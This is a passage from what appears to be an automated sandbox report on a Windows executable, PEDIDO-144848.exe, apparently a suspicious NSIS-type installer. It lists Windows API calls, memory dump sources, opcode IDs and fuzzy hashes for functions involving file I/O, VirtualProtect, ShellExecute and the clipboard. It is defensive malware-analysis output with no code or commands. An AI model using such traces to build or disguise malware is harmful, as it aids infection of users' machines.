                                                        • Instruction ID: 12eae925539b7dc367c8ab6fa63785f67f6a0dd6345a275e5017c2f2efb43849
                                                        • Opcode Fuzzy Hash: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                        • Instruction Fuzzy Hash: ADE0B676250108BEDB00EFA9EE4AE9977ECAB58740F108421B608E70A1C678E5508B69
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403135,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405A9F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                        • Instruction ID: 3049aa00f6096361bf05a549768cb7fbda67778921cce1d2793645b00ea59393
                                                        • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                        • Instruction Fuzzy Hash: 56E08C3260521ABBEF119E508C40EEB3B6CEB043A0F008933F914E2180E230E8219FE4
                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030EB,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405ACE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction ID: 32d48f6e8b76b53ead5095efbfc7dc84fe3b04974c76bcad3a7819726962f715
                                                        • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction Fuzzy Hash: CEE0B63261429AABDF109E659C40AAB7B6CFF05360F148533B915E6150E231E8219EA5
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                        • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                        • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                        • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                        APIs
                                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileString
                                                        • String ID:
                                                        • API String ID: 1096422788-0
                                                        • Opcode ID: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                        • Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
                                                        • Opcode Fuzzy Hash: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                        • Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
                                                        APIs
                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                        • Instruction ID: 089d8403b4a3c67af6c4af196b8dedf915adbd4a042e4b2ee6fd832a67879694
                                                        • Opcode Fuzzy Hash: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                        • Instruction Fuzzy Hash: 34D05B72704115DBDB10DBE5EB0869D77A0AB40364F304537D151F21D0D2BADA559719
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,0002FFE4), ref: 00403146
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                        • Instruction ID: a8a1054ff6e124a16992140d9831d4e67a861e682019e3b6a28de944f62df8e5
                                                        • Opcode Fuzzy Hash: 5103c2e833fb6cec983ac643f83c5405fcf5b56718913b7927d61a5481dde75b
                                                        • Instruction Fuzzy Hash: B5D05E73B141519BD750EBB8BAC445E77E4EB403257304837E502E2091E67989429618
                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                        • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                                        • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                                        • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405156
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405165
                                                        • GetClientRect.USER32(?,?), ref: 004051A2
                                                        • GetSystemMetrics.USER32(00000002), ref: 004051A9
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004051CA
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051DB
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004051EE
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004051FC
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040520F
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405231
                                                        • ShowWindow.USER32(?,00000008), ref: 00405245
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405266
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405276
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040528F
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040529B
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405174
                                                          • Part of subcall function 00403FBA: SendMessageA.USER32(00000028,?,?,00403DEB), ref: 00403FC8
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052B7
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000508B,00000000), ref: 004052C5
                                                        • CloseHandle.KERNEL32(00000000), ref: 004052CC
                                                        • ShowWindow.USER32(00000000), ref: 004052EF
                                                        • ShowWindow.USER32(?,00000008), ref: 004052F6
                                                        • ShowWindow.USER32(00000008), ref: 0040533C
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                        • CreatePopupMenu.USER32 ref: 00405381
                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405396
                                                        • GetWindowRect.USER32(?,000000FF), ref: 004053B6
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053CF
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040540B
                                                        • OpenClipboard.USER32(00000000), ref: 0040541B
                                                        • EmptyClipboard.USER32 ref: 00405421
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040542A
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405434
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405448
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405461
                                                        • SetClipboardData.USER32(?,00000000), ref: 0040546C
                                                        • CloseClipboard.USER32 ref: 00405472
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: @y
                                                        • API String ID: 590372296-2793234042
                                                        • Opcode ID: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                        • Instruction ID: 669047f9f67e304dd712f5be3c8e464dbcc99e7ae4a165c688d328355b6db051
                                                        • Opcode Fuzzy Hash: fb478b241302d14890c8e569f688314f17ac97b328ad1953f1dfc7460e5c88c7
                                                        • Instruction Fuzzy Hash: 9DA16970900249BFEF119FA0DD89EAE7F79EB08354F00806AFA05B61A0C7795E50DF69
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040494E
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404959
                                                        • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004049A3
                                                        • LoadBitmapA.USER32(0000006E), ref: 004049B6
                                                        • SetWindowLongA.USER32(?,000000FC,00404F2D), ref: 004049CF
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E3
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004049F5
                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404A0B
                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A17
                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A29
                                                        • DeleteObject.GDI32(00000000), ref: 00404A2C
                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A57
                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A63
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AF8
                                                        • SendMessageA.USER32(?,0000110A,?,00000000), ref: 00404B23
                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B37
                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404B66
                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B74
                                                        • ShowWindow.USER32(?,00000005), ref: 00404B85
                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C82
                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CE7
                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404CFC
                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D20
                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D40
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D55
                                                        • GlobalFree.KERNEL32(?), ref: 00404D65
                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DDE
                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404E87
                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E96
                                                        • InvalidateRect.USER32(?,00000000,?), ref: 00404EB6
                                                        • ShowWindow.USER32(?,00000000), ref: 00404F04
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F0F
                                                        • ShowWindow.USER32(00000000), ref: 00404F16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                        • Instruction ID: 10d6cb261f95093856db0383de4589f8155b4d68da151c8c89fd000e0678f767
                                                        • Opcode Fuzzy Hash: 56b3b82b533b733a33c13492c2ad1bc1f2630ac234a6e512c7e667a37d25cb4c
                                                        • Instruction Fuzzy Hash: AB027CB0900209AFEB14DF64DC85AAE7BB9FB84314F10817AF610BA2E1D7789D51CF58
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404412
                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040443C
                                                        • SHBrowseForFolderA.SHELL32(?,0079D918,?), ref: 004044ED
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004044F8
                                                        • lstrcmpiA.KERNEL32(Call,0079E540), ref: 0040452A
                                                        • lstrcatA.KERNEL32(?,Call), ref: 00404536
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404548
                                                          • Part of subcall function 0040557A: GetDlgItemTextA.USER32(?,?,00000400,0040457F), ref: 0040558D
                                                          • Part of subcall function 0040600B: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406063
                                                          • Part of subcall function 0040600B: CharNextA.USER32(?,?,?,00000000), ref: 00406070
                                                          • Part of subcall function 0040600B: CharNextA.USER32(?,"C:\Users\user\Desktop\PEDIDO-144848.exe",758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406075
                                                          • Part of subcall function 0040600B: CharPrevA.USER32(?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000,0040315B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00406085
                                                        • GetDiskFreeSpaceA.KERNEL32(0079D510,?,?,0000040F,?,0079D510,0079D510,?,?,0079D510,?,?,000003FB,?), ref: 00404606
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404621
                                                          • Part of subcall function 0040477A: lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                          • Part of subcall function 0040477A: wsprintfA.USER32 ref: 00404820
                                                          • Part of subcall function 0040477A: SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: @y$A$C:\Users\user\slavelivets$Call
                                                        • API String ID: 2624150263-2138057794
                                                        • Opcode ID: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                        • Instruction ID: b79cf5757fdebc40129ea8bf430174fd55c22843b8008fc959c2d10819856cf3
                                                        • Opcode Fuzzy Hash: 3d12c395db0b8a5e031a22e6692dd266f1d5deac6801d88cb2d33c24727f66a7
                                                        • Instruction Fuzzy Hash: A3A170B1900209ABDB11EFA5CC45BAF77B8EF85314F10843BF611B62D1E77C9A418B69
                                                        APIs
                                                          • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                        • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                        • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                        • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                        • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                        • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc
                                                        • String ID:
                                                        • API String ID: 4227406936-0
                                                        • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                        • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                        • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                        • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                        APIs
                                                        • CoCreateInstance.OLE32(00407408,?,?,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214C
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                        Strings
                                                        • C:\Users\user\slavelivets, xrefs: 0040218C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\slavelivets
                                                        • API String ID: 123533781-1403250623
                                                        • Opcode ID: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                        • Instruction ID: 3b959fe0d73b6f2ff8ba1a3dad26e84ad0429d5bc67268e837327fa781b0949d
                                                        • Opcode Fuzzy Hash: 9afc873253917f5f4e985fd398202ffa23981bb55cb45aee65fcfdfca240a494
                                                        • Instruction Fuzzy Hash: 705116B5E00208BFCB00DFE4C988A9DBBB6EF48314B2445AAF515FB2D1DA799941CB54
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040271A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                        • Instruction ID: 3ccff3199aeab2db1e2dd923352da36f4292fa18247536f83ce369c7762b159a
                                                        • Opcode Fuzzy Hash: fce0c61a2aa14f88a491396f2313ca711f415b7b1927e6be8b43a2417c2e171c
                                                        • Instruction Fuzzy Hash: 76F05572604110EFD700EBA49A089FEB768DF15324FA0407BF181F20C0CBBC8A429B2A
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AEE
                                                        • ShowWindow.USER32(?), ref: 00403B0B
                                                        • DestroyWindow.USER32 ref: 00403B1F
                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B3B
                                                        • GetDlgItem.USER32(?,?), ref: 00403B5C
                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B70
                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B77
                                                        • GetDlgItem.USER32(?,?), ref: 00403C25
                                                        • GetDlgItem.USER32(?,00000002), ref: 00403C2F
                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403C49
                                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403C9A
                                                        • GetDlgItem.USER32(?,?), ref: 00403D40
                                                        • ShowWindow.USER32(00000000,?), ref: 00403D61
                                                        • EnableWindow.USER32(?,?), ref: 00403D73
                                                        • EnableWindow.USER32(?,?), ref: 00403D8E
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403DA4
                                                        • EnableMenuItem.USER32(00000000), ref: 00403DAB
                                                        • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403DC3
                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DD6
                                                        • lstrlenA.KERNEL32(0079E540,?,0079E540,Rse Setup), ref: 00403DFF
                                                        • SetWindowTextA.USER32(?,0079E540), ref: 00403E0E
                                                        • ShowWindow.USER32(?,0000000A), ref: 00403F42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID: @y$Rse Setup
                                                        • API String ID: 184305955-1867395490
                                                        • Opcode ID: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                        • Instruction ID: 1a58b870ca21ce47ba752d56327be38b30dd2316994c96cb4837d6e7696a1104
                                                        • Opcode Fuzzy Hash: c2e5c8a98494131a3f5258506286a32dbf8d0bdf9ff6fe3114ac61fbbd238155
                                                        • Instruction Fuzzy Hash: 81C1AF71904201ABEB216F61ED89E2A7EBCEB4570AF40853EF601B11F1C73DA941DB1E
                                                        APIs
                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404159
                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040416D
                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040418B
                                                        • GetSysColor.USER32(?), ref: 0040419C
                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041AB
                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041BA
                                                        • lstrlenA.KERNEL32(?), ref: 004041BD
                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041CC
                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041E1
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404243
                                                        • SendMessageA.USER32(00000000), ref: 00404246
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404271
                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042B1
                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004042C0
                                                        • SetCursor.USER32(00000000), ref: 004042C9
                                                        • ShellExecuteA.SHELL32(0000070B,open,007A0EE0,00000000,00000000,?), ref: 004042DC
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004042E9
                                                        • SetCursor.USER32(00000000), ref: 004042EC
                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404318
                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040432C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: Call$N$open
                                                        • API String ID: 3615053054-2563687911
                                                        • Opcode ID: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                        • Instruction ID: 601bc5fe35b3c5de407f3786c3433e5d67f1b6e9b87549a619d2750a8ed94523
                                                        • Opcode Fuzzy Hash: 2bd72d0c45eb893bd58c56080fda348c45ce57ca2b38d375d74f0412c252b757
                                                        • Instruction Fuzzy Hash: 6B61A5B1A40209BFEB109F61CC45F6A7B79FB84705F108026FB05BA2D1C7B8A951CF58
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextA.USER32(00000000,Rse Setup,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F$Rse Setup
                                                        • API String ID: 941294808-2439763508
                                                        • Opcode ID: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                        • Instruction ID: 5377a76c68583d826c01589a66ce84b6d9bb3dc06a218cd9f98f6b2c798b1645
                                                        • Opcode Fuzzy Hash: 0a68615732e4b88a98f313291f6562efd0598cab8c65ff7e1a40b4ddd25604da
                                                        • Instruction Fuzzy Hash: 74419C71804249AFCB058FA5CD459BFBFB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                        APIs
                                                        • lstrcpyA.KERNEL32(007A02D0,NUL,?,00000000,?,00000000,00405C7C,?,?), ref: 00405AF8
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405C7C,?,?), ref: 00405B1C
                                                        • GetShortPathNameA.KERNEL32(?,007A02D0,00000400), ref: 00405B25
